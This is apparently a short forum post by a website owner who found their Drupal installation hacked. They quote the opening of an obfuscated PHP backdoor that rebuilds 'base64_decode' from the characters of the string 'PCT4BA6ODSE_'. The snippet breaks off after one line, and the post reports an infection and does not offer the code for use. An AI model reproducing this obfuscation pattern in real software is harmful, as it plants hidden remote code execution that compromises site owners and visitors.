My Drupal was hacked: Remote Code Execution – base64_decode() with ‘PCT4BA6ODSE_’

today I woke up surprised that my website was hacked. I found scripts like this in several files of my Drupal instalation $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF...